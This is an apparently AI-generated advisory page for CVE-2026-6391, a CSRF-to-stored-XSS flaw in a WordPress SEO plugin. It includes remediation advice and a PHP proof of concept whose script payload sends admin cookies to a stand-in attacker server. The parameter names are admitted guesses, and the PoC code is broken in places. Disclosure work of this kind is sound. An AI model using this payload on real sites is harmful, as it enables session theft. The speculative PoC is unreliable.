Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 21, 2026

CVE-2026-6391: Sentence To SEO (keywords, description and tags) <= 1.0 – Cross-Site Request Forgery to Stored Cross-Site Scripting via Settings Page Parameters (sentence-to-seo)

CVE ID CVE-2026-6391
Plugin sentence-to-seo
Severity Medium (CVSS 6.1)
CWE 352
Vulnerable Version 1.0
Patched Version
Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6391 (metadata-based): This vulnerability affects the Sentence To SEO (keywords, description and tags) plugin for WordPress, version 1.0 and earlier. The plugin fails to implement Cross-Site Request Forgery (CSRF) protection on its settings page, specifically within the create_admin_page() function. This allows an unauthenticated attacker to trick a site administrator into performing unintended actions, leading to Stored Cross-Site Scripting (XSS) via plugin settings parameters. The CVSS score is 6.1 (Medium), with a vector indicating network attack vector, low complexity, no privileges required, user interaction required, and a scope change from limited confidentiality and integrity impact.

The root cause is the missing or incorrect nonce validation on the create_admin_page() function. In WordPress, nonces are security tokens that verify the intent of a user submitting a form or making a request. Admin settings pages typically include nonce fields in forms and validate them on submission. Atomic Edge analysis infers that the plugin’s settings page processes and saves user input (e.g., keywords, description, tags) without checking a nonce. Since Stored XSS is also mentioned, the plugin likely saves unsanitized input to the database and displays it without proper escaping. This inference is based on the CWE classification (352) and the vulnerability description; no code diff is available for confirmation.

Exploitation requires an attacker to craft a malicious HTML page with a form that automatically submits to the plugin’s settings page URL. The form POSTs to a WordPress admin URL like /wp-admin/options-general.php?page=sentence-to-seo or similar, though the exact admin page slug is inferred from the plugin name. The attacker includes malicious JavaScript payloads in plugin-specific parameter names such as seo_keywords, seo_description, or seo_tags. The attacker then lures an authenticated administrator to click a link or visit the crafted page. The browser sends a valid authenticated session, and the CSRF request modifies the plugin settings, injecting the XSS payload into the database. When the settings page is later viewed, the stored script executes in the admin’s browser context.

Remediation requires the plugin developer to implement proper CSRF protection in the create_admin_page() function. The fix should include a WordPress nonce field using wp_nonce_field() in the form and verify it with check_admin_referer() or wp_verify_nonce() on form submission. Additionally, all input fields must be sanitized with functions like sanitize_text_field() before database storage, and output must be escaped with esc_html() or similar. Since no patched version is available, site administrators should disable or remove the plugin until a security update is released.

Impact if exploited includes Stored Cross-Site Scripting, allowing an attacker to execute arbitrary JavaScript in the context of the vulnerable WordPress admin panel. The attacker could steal session cookies, modify admin pages, create new admin users, or redirect visitors to malicious sites. Since the XSS is stored, every administrator who views the plugin settings page triggers the payload. The scope change in the CVSS vector reflects that the vulnerable component affects the broader WordPress application, potentially compromising the entire site.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6391 - Sentence To SEO (keywords, description and tags) <= 1.0 - CSRF to Stored XSS

// This PoC demonstrates how an unauthenticated attacker can trigger a CSRF attack
// to inject malicious JavaScript into the plugin settings.
// Assumes the plugin admin page is at /wp-admin/options-general.php?page=sentence-to-seo

$target_url = 'http://example.com'; // Change this to the target WordPress URL

// The plugin settings page (inferred from plugin slug)
$settings_url = $target_url . '/wp-admin/options-general.php?page=sentence-to-seo';

// Malicious XSS payload to inject into plugin settings
$xss_payload = '<script>fetch('http://attacker-controlled-server.com/steal?cookie=' + document.cookie)</script>';

// Parameters for the plugin settings (inferred parameter names)
$post_data = array(
    'seo_keywords' => $xss_payload,
    'seo_description' => $xss_payload,
    'seo_tags' => $xss_payload,
    'submit' => 'Save Settings'
);

// Initialize cURL
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_COOKIE, ''); // No cookie needed - this demonstrates CSRF from attacker's perspective

// Execute request (this would need to be triggered via an admin's browser)
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'Error: ' . curl_error($ch) . "n";
} else {
    echo "CSRF request sent to: $settings_urln";
    echo "Payload injected: $xss_payloadn";
    echo "Response headers:n";
    echo $response;
}

// Close cURL
curl_close($ch);

// Note: This PoC demonstrates the request structure.
// In a real CSRF attack, the attacker would host an HTML page with an auto-submitting form
// that the admin visits while logged into WordPress.
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School